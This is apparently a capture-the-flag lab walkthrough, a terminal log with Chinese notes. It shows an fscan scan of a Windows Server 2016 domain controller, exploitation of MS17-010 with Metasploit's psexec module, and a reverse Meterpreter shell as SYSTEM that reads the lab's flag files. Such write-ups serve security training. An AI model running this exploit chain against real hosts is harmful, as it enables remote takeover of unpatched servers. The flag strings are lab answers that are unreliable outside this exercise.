┌──(root㉿kali)-[/home/kali/thl/doraemon]
└─# fscan -h 192.168.10.5
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.10.5:139 open
192.168.10.5:445 open
192.168.10.5:135 open
192.168.10.5:88 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.10.5
[->]WIN-VRU3GG3DPLJ
[->]192.168.10.5
[+] MS17-010 192.168.10.5 (Windows Server 2016 Datacenter 14393)
[*] NetBios 192.168.10.5 [+] DC:WIN-VRU3GG3DPLJ.DORAEMON.THL ▒Windows Server 2016 Datacenter 14393
已完成 4/4
[*] 扫描结束,耗时: 1.017942284s
域名 DORAEMON.THL
DC WIN-VRU3GG3DPLJ.DORAEMON.THL
先配hosts
发现有ms17-010
看看能不能用、直接梭哈
msfconsole
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.10.5
set lhost 192.168.10.3
run
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.10.3:4444
[*] 192.168.10.5:445 - Target OS: Windows Server 2016 Datacenter 14393
[*] 192.168.10.5:445 - Built a write-what-where primitive...
[+] 192.168.10.5:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.10.5:445 - Selecting PowerShell target
[*] 192.168.10.5:445 - Executing the payload...
[+] 192.168.10.5:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 192.168.10.5
[*] Meterpreter session 1 opened (192.168.10.3:4444 -> 192.168.10.5:49724) at 2024-12-05 15:23:39 +0800
meterpreter > shell
Process 1124 created.
Channel 1 created.
Microsoft Windows [Versi▒n 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
这应该是拿下了吧
c:\Users\Administrador\Desktop>type root.txt
type root.txt
advcrfbuiwergvb78wer9hg3n4sdfs43
c:\Users>type Suneo\desktop\user.txt
type Suneo\desktop\user.txt
asfre6vcergv3bvfsiregvrtetgb9rnwn543